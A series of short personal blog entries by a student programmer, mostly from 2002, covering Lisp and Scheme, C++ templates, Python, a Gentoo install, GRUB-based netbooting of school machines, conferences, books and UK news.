Kali is a Scheme which can move closures and continuations across computers. I've yet to read their paper (it's currently top of list thou), but it looks sweet

I'm off to pickup a nice big book on compiler design from Smiths tomorrow

Kotako was down for a cou...

Kotako was down for a couple of days due to a power outage, so I'm guessing lots of email bounced. I'm sure people will resend it.

An apt-get on metis foobared it as upgrading caused /bin/zsh to disappear, thus needing a power cycle and an init=/bin/sh since zsh was root's shell. The IP address also changed on the new boot so it will take a little time for the DNS to shake out (more so since the DNS server for imperialviolet.org just died).

The RIAA (boo! hiss!) has published a paper on file sharing networks. This one is lacking the torrent of crap which is the usual mark of output from these sort of organisations. At 75 pages of information I mostly already know I'm not going to read it all, however it does mention Freenet lots. Some choice quotes (mostly they are pretty nice to us!)

As of this writing, the Freenet community has yet to release a usable Windows client and demonstrate its real-world scalability.

Ok, so that's the only bad quote about Freenet that I could find (and even that's pretty fair)

My Programming Language Crisis (not mine thou). Interesting reading, even if I cannot agree with his placing Ocaml first (if only because of that syntax). But Python comes second

Andy Oram on semantic webs

I'm using SpamAssassin at the moment and it's doing a really good job at filtering spam (with little messages about why a given mail was filtered and things). However, since it's written in Perl, I'm wondering if I could manually delete the spam far faster than it can. In fact I'm pretty sure I could. Hmm

I've promised to stop playing web designer since IV renders really badly in Netscape4. Maybe if I get time I'll fix it

China's home web use soars

New KernelTraffic out (#1...

New Kernel Traffic out (#163)

My Gentoo install at school is going pretty well (certainly a lot faster than the install at home over my 56K dialup link). A few niggles about Gentoo:

In light of the last point I should remember Ctrl-SysRq-K is the one to kill the current terminal's processes. It's called SAK thou, which is why I missed it today (System Attention Key).

IV validates again as HTML and CSS. It's only HTML 4.01 Transitional thou. Maybe I should try and make it XHTML Strict or something.

Lisp kicking arse here and here (second link is NYT)

Another BIO link (OMG I look an idiot in that photo!)

**** Kotako is down (mail to agl@imperialviolet.org should still work thou) ****

Yesterday I must have got...

Yesterday I must have got about 4 hours sleep on the coach to and from London, and about 9 hours sleep last night and I still feel like I could curl up and sleep some more!

Mailed zooko about his backup MXes being broken

Mother's birthday today. Got her a huge box of chocolates and some smelly stuff (I'm awful at buying presents, but the rule if (female) { buy (smell_stuff); } seems to work pretty well)

Been reading The Qmail Handbook. I've been using qmail for ages on all my boxes, but this is a really useful book. With an animal on the front, this would be an O'Reilly book

Another link for Aspect OP, which I've mentioned before

Guardian article on a ray of light in S.Africa's AIDS policy

If a google search returns 0 results and there's a spelling correction then google now automatically tries the corrected search

Another self link to prin...

Another self link to print off tomorrow: A Case for Automatic Run-Time Code Optimisation

Took the image out-of-lin...

Took the image out-of-line since the load times were too long

Firstly a better link to ...

Firstly a better link to the IOI2002 site which I linked to yesterday (this one's in English at least)

Maths on the Web: a link from IRC might be interesting to some people. Personally I think HTML is a massive pile of crap which is only just rescued by strict HTML 4.01 and CSS. Mozilla is implementing Math-ML in current versions but there are still many browsers for which this site could be useful. Then again you could just do the right thing and use PDF (without Type3 fonts thou!)

Lisp Magazine. Lisp is cool. Nuff said.

An old, but interesting paper on why people are violent.

Goo is a YetAnotherLanguageGoingNowhere, but at least I'm interested in this one. It's an S-expression based language (as all languages should be) which calls gcc live to do incremental compilation. Clean, but not the head-in-the-sand clean like Scheme.

Just a link to myself really since I want to print this off tomorrow (it's a paper linked from the GOO site anyway) Adaptive Optimization For Self: Reconciling High Performance With Exploratory Programming

As an end note I'd just like to say I like trains. Despite the battering that the UK rail network gets in the press I've managed to go from Warwick to Cheltenham, Cheltenham to Cambridge and back without a hitch in the last couple of weeks. For one of those trips I was even travelling on a Sunday (when track repairs and the like are done).

Well, I made the internat...

Well, I made the international team and I'm off to the world finals in South Korea. Maybe I should have a stab at learning Korean. I also got a copy of Introduction to Algorithms as a prize (the one with the hanging red things coauthored by Rivest) so I'm reading that.

I also talked to a really smart guy called TBL (who works at Lionhead) and I'm pondering some really nutty debuggering ideas now.

I should write a review of Bruce Sterling's Distraction, but I can't be bothered to write too much, so here goes with a reviewette: It's a good book, but I didn't ever feel like I cared about the characters enough to really want to read on. I could have dropped this book half way through and not batted an eye. Despite this (I should think being trapped on a train for hours and hours helped) I finished it, and it's still good by the end. Nothing stunning, but good.

Well, I'm off to BIO tomo...

Well, I'm off to BIO tomorrow so no IV updates for another weekend (but then there haven't been any since Monday anyway)

Let us look at my bookmarks over the last couple of days then

First there is Mono, the free .NET implementation. Quite a lot of smart people at the ACCU were saying that .NET has some good ideas in it (a first for Microsoft) and I was thinking about building a neat little garbage collector for it. Unfortunately it needs MS's C# compiler to build - so that idea is fscked. (with a little kernel help the GC could have been good too, oh well).

I've also been looking at Gentoo. This is a build-everything-from-src distrib; it's (sort of) reviewed here on /.. Since it downloads lots (the ISO is only 16MB) you need a good internet pipe and my 56K isn't going to cut it. Thus I've been trying to install it at school (cable modem).

The first point is that GNU parted is good for resizing FAT partitions and the second is that my victim box doesn't have a CDROM (and I don't have a burner either). So in the tradition of playing with anything that looks fun (cough! Smile!) I loopback mounted the ISO and netbooted a box to run the ISO via NFS. It actually seemed to work a little. Maybe more when I get back to it Tues.

Next down in my bookmarks is Stackless Python. Now, I've always thought that Python's dynamic naming was such a sucky idea (and pychecker is too much of a pain to use), but the rest of Python makes up for it. At the UK Python conference I said that Python was just becoming Lisp (w/o S-expressions) and stackless makes it more so. Basically they add continuations support and the like (Python generators are a crippled version of this).
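To show what the "crippled version" buys you, here is a plain generator in standard Python (nothing Stackless-specific; `counter` is just a made-up example). The function's frame is suspended at each `yield` and picked up again later with its locals intact:

```python
def counter(limit):
    """Yield 0, 1, ..., limit - 1, pausing after each value."""
    n = 0
    while n < limit:
        yield n      # execution stops here until the caller asks again
        n += 1


gen = counter(3)
first = next(gen)    # runs up to the first yield
second = next(gen)   # resumes after that yield with n still in scope
rest = list(gen)     # drains whatever is left
```

The limitation is that a generator can only hand control back to whoever called it, from its own frame, and only runs forwards. A full continuation captures the whole call stack and can be resumed from anywhere.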

I've also been looking at Aspect orientated programming, but haven't grokked it enough to say anything really. Looks like it might be pretty cool thou.

I've been looking at the ...

I've been looking at the Lambda library (can't find URL right now, try google). This is a pretty stunning template library for C++, an example:

for_each (l.begin(), l.end(), cout << free1 << endl);

Go read that again if you want, I'll wait. Yes, you do see code inserted in the middle of a function call - and it works! I thought Modern C++ Design was pretty stunning, but this is just wow! Now I know that Lisp does this with its eyes closed, but C++ never has been a functional language and it's a testament to templates that they can be used to do this kind of stuff.
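The trick underneath is operator overloading: the placeholder is an object whose operators build up a function object instead of computing a value. The sketch below shows the same idea in Python rather than C++ templates, so it is an analogy and not how the Lambda library is written; `Expr`, `_lift` and `arg1` are names invented for this example, with `arg1` playing the part of `free1`.

```python
class Expr:
    """A deferred expression of one argument, built up by operators."""

    def __init__(self, fn):
        self.fn = fn

    def __call__(self, x):
        return self.fn(x)

    def __add__(self, other):
        return Expr(lambda x: self(x) + _lift(other)(x))

    def __mul__(self, other):
        return Expr(lambda x: self(x) * _lift(other)(x))


def _lift(value):
    """Wrap a plain constant so it can be called like an Expr."""
    return value if isinstance(value, Expr) else Expr(lambda x: value)


arg1 = Expr(lambda x: x)   # the placeholder: stands for "the argument"

# `arg1 * 2 + 1` is not evaluated here; it builds a callable object
# that map() then applies to each element.
results = list(map(arg1 * 2 + 1, [1, 2, 3]))
```

In C++ the same composition happens at compile time through templates, which is why the result can be as fast as a hand-written loop.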

If you don't read Dilbert, why not? Smile! [looks like Dilbert links don't stick around]

I'm back! And damm, that ...

I'm back! And damn, that conference was good. Now, I don't have great experience with conferences (O'Reilly P2P1 last year and ACCU 2002 so far). But during every slot there was something I wanted to go to, and usually 2 or 3 things. The speaker list could be read off a list of the great books on C++ and there were no managers or reporters.

My presentation went great (it was my first time presenting). Everyone said it was very impressive (admittedly, they weren't going to say it was crap to me, but they could have said nothing at all) and I had more than enough to fill the 90 minutes. In fact, if there was one thing wrong with it, it was that it was too long.

School tomorrow, sigh

I'm off to present at the...

I'm off to present at the ACCU conference. Wish me luck about 11am BST on Sat.

Because of that I'm going to be out of contact until at least Sunday

So WeHaveTheWayOut comes up running OpenBSD and after the media storm switches to IIS 5. Now it's down!. Currently returns "No web site is configured at this address.". Smile!

(note the solution to :) at the end of a bracketed sentence! Smile!)

Hmm, seems I did pretty w...

Hmm, seems I did pretty well in the Information Olympiad (however you spell it) and they want me to go to the final in Cambridge. I wonder how I'm getting there.

I found this in No Logo last night:

The most creative response came from students at the University of Toronto. A handful of undergraduates landed part-time jobs with the wash room billboard company and kept conveniently losing the custom-made screwdrivers that opened the 400 plastic frames. Pretty soon, a group calling themselves the Escher Appreciation Society were breaking into the "student-proof" frames and systematically replacing the bathroom ads with prints by Escher.

OMG! How cool are those people!! (I sound like pupok :) )

Dilbert rocks today [looks like Dilbert links don't stick around]

Well, the Queen Mother ha...

Well, the Queen Mother has died and, boy, don't we know it. Now, don't get me wrong - it's headline news, but you can't move for tributes to her. Back to back tributes, and stories about her life, stories about mourners - all for someone that few people knew and whose death will only really affect a handful of close family. Lots of very nice old women died last week - and I don't see the BBC going nuts over them.

On a more cynical note - now is just the time we need reporting on other matters as anyone with an announcement that they want to bury will be making it now. (as Mrs Moore demonstrated)

Also, we've switched to British Summer Time - which now means that my bed side clock is right (I hadn't changed it since last time :)

(and there's a question for you all - if you put a :) thing at the end of a bracket span, do you also put a close bracket?)

It's good to know there are others as cynical as I re queen mum. The usual moan is the rescheduling of TV but since there wasn't much on yesterday this is no loss. I used to think the monarchy have no power but it seems their grip on the media is their real power now. The situation remains, though, that Japanese tourists etc know more about our royal family than any of us do! Dad wanted to go to the Alfa Romeo show at the Science museum today so the announcement on Saturday night caused him more irritation than sadness (ie London being flooded with mourners etc).

Kernel security problem...

Kernel security problem

OperationEnduring Valenti...

Operation Enduring Valenti

Sigh - madness spreads to...

Sigh - madness spreads to Canada

Preaching to the choir

Big shock: XP Server == X...

Big shock: XP Server == XP Pro etc at The Reg. The ZIP file has been pulled already - I would mirror it otherwise.

Mark Thomas is on tonight, Chan 4, 11pm (and I missed Century of the Self! Aggh!)

Bloom Filters and The future of multi-player online games

And today's (not so) wise words:

Bex: ginger is never sexy

I think we'll all feel smarter having read that

Well, it's the Easter hol...

Well, it's the Easter holiday and (between revision) I'm getting quite a lot of reading done. Emergence is starting to drag a little now I'm half way through. Don't get me wrong, it's a good book - I'm just wondering when it's going to say something interesting. It also lacks that indefinable fluid quality to its prose which makes a book easy reading.

In its place I've picked up Flux (Stephen Baxter, 0-00-647620-1) which ok (not up to his usual standard thou), and No Logo (Naomi Klein, 0-00-653040-0). No Logo is an very interesting book on advertising and has avoided some of the fanatical anti-corporatism which is the bane of many of her peers.

No interesting papers or links recently (except maybe this)

Remember, you have to run...

Remember, you have to run as fast as you can just to stay in the same place: 1024-bit keys now considered weak. You have to keep in mind what your attack model is, but now might be the time to move to 2048-bit keys (at the very least you must support large keys in your apps).

A bunch of random links

Vodafone's personally written press releases (if they pull it let me know, I have a local copy)

I dug these up for something else - but I might as well post them here:

Great comedy links from This reg page

Don't forget Century of the Self (8pm, Sunday, BBC2)

Zooko has updated his P2P...

Zooko has updated his P2P names paper

I put GRUB on the HDD of one of the netboot boxes and, thou it boots Linux ok, it can't seem to boot Windows. The docs reference a chainload command which, unfortunately, doesn't seem to exist in GRUB. So this poor box is sitting there, booting GRUB, which tries to boot Windows but ends up booting itself again in a loop - oh well.

/. has a good story about those Scientology bastards acting up again. Go read Clambake (which is /.'ed just now). Kick a Scientologist's butt today.

Wes has some good links today (another bit about CoS, one about Gosling dreaming again and one about a PayPal SDK. The SDK looks almost worthless (no pun intended) - but it's a step in the right direction).

One of the links Wes has is to Valgrind, which is worth a read. See the impl doc. Wow

Book of the moment: Emergence, John Holland, ISBN 0-19-286211-1

Well, I got the netbootin...

Well, I got the netbooting thing working pretty well. In the end it was a 128MB box because I have no idea what NIC the 16MB boxes have.

The startup sequence goes something like this:

Which, all in all, is pretty sweet. I need to allow anonymous logins and error check some more stuff in that script. I also need to set up home dirs with good Mozilla defaults (proxies set up etc). But nearly there.

Live it (thanks to Zooko f...

Live it (thanks to Zooko for the link)

Someone mentioned net boo...

Someone mentioned net booting some of the poor bloated Windoze boxes at school just before I left Friday afternoon. I'm not quite sure what they had in mind, but it sounded like fun.

Google turned up the Diskless Nodes HOW-TO which talks about Etherboot and Netboot. I downloaded the srcs and they didn't look like what I had in mind so I did an `info grub` (as I always do for all my boot loading problems) and sure enough, GRUB does it! :).

You just need to pass a driver name at configure time and GRUB builds with all the netbooting commands. I set up zen with tftp (for the kernel) and nfs, and built a stripped down kernel to test with a little 486 I have sitting around. This is all the GRUB you need to netboot:

dhcp
root (nd)
kernel /usr/share/tftp/bzImage root=/dev/nfs nfsroot=1.1.1.1:/nfs ip=:1.1.1.1:1.1.1.1:255.0.0.0:nbclient:eth0:dhcp init=/bin/sh

The only difficult bit is the kernel options which are described in Documentation/nfsroot.txt
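As a rough aid to reading that ip= option, here is a small Python sketch that splits it into named fields. The field order (client IP, server IP, gateway, netmask, hostname, device, autoconf) is the one nfsroot.txt describes; the function and field names are just ones I've made up for illustration, and shorthand forms like ip=dhcp aren't handled.

```python
# Field order as described in the kernel's Documentation/nfsroot.txt.
# The names themselves are illustrative, not anything the kernel uses.
IP_FIELDS = ("client_ip", "server_ip", "gateway_ip", "netmask",
             "hostname", "device", "autoconf")


def parse_ip_param(param):
    """Split an 'ip=a:b:c:...' kernel argument into a dict of named fields.

    Empty fields come back as None, i.e. left for autoconfiguration.
    Shorthand forms such as 'ip=dhcp' are not handled by this sketch.
    """
    if not param.startswith("ip="):
        raise ValueError("expected an argument starting with 'ip='")
    values = param[len("ip="):].split(":")
    if len(values) > len(IP_FIELDS):
        raise ValueError("more fields than this sketch knows about")
    # Pad out any trailing fields that were omitted.
    values += [""] * (len(IP_FIELDS) - len(values))
    return {name: (value or None) for name, value in zip(IP_FIELDS, values)}


if __name__ == "__main__":
    arg = "ip=:1.1.1.1:1.1.1.1:255.0.0.0:nbclient:eth0:dhcp"
    for name, value in parse_ip_param(arg).items():
        print(name, "=", value)
```

Read this way, the line above leaves the client address empty (so DHCP supplies it), uses 1.1.1.1 as both server and gateway, and names the box nbclient on eth0.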

Now I've got to decide what I'm going to do. They are only 16MB boxes, which is a bit small for X and Netscape (I just did that with a minimal Slackware today in 16MB). I'm going to try DirectFB/GTK+ when I have more bandwidth to download it and I may have the boxes swapping across the LAN

(it would also be cool if I could get them to SMB mount the user's home dir from the NT boxes)

Will keep iv.org posted on how this pans out

oierw: (I would rather see work done on) whiterose (rather than a compiler) with a varient achord
agl: I guess - I'm just bored with wrose
agl: I consider something done when I figured out all the interresting bits
agl: wrose has been `done' for ages now

FreeBSD has some cool ker...

FreeBSD has some cool kernel features like kqueue and aio (yes, you can tell me they exist in your favorite OS, if you like). Maybe I should follow this.

On the Scheme compiling front, this is a damn fine resource for the interesting bits and this is a good book (and all online!) on the subject

Found this link from a com...

Found this link from a comment on AlterSlash - I love JWZ's grumbles :).

I got the Moulin Rouge and Romeo+Juliet DVD - both really good films.

This site is really useful for UK people. It beats the sucky Radiotimes site at least

I found this in my home ...

I found this in my home dir (I often download stuff for later reading and then forget where I got it from). I've heard of it before but never read the paper (which is really worth reading - wow)

Download: evolved-fpga.ps.gz

Got round to fixing up iv...

Got round to fixing up iv.org, which I've been meaning to do for a long time (still looks crap in Netscrape thou). Linuxpower.org was down for the whole weekend and I'm considering if I should shift my email to iv.org - but since that is pretty much the first time lp has been down in years I think I'll stick with it

Currently reading papers on Scheme implementation and thinking about optimising compilers. This is a very good resource and even links to a paper by Scott! (so it must be good :).

Looking again at Pliant, which I'm sure would be stunning if I could understand it. A little worried that it seems to lack closures, first-class functions, continuations and the like - but I would bet that you could add them within the language

Also looking at AChord which looks interesting, but certainly has some weaknesses. These don't seem too hard to fix, however, and I might write something up about it sometime.

cherub: did brandon tell you that just before his talk he thought of a really easy attack on achord?
cherub: he thinks he can fix it, though
cherub: and I think one of the slightly more complicated designs we came up with while working on achrod might not have the problem

Book of the moment: The Thread of Life 0-521-46542-7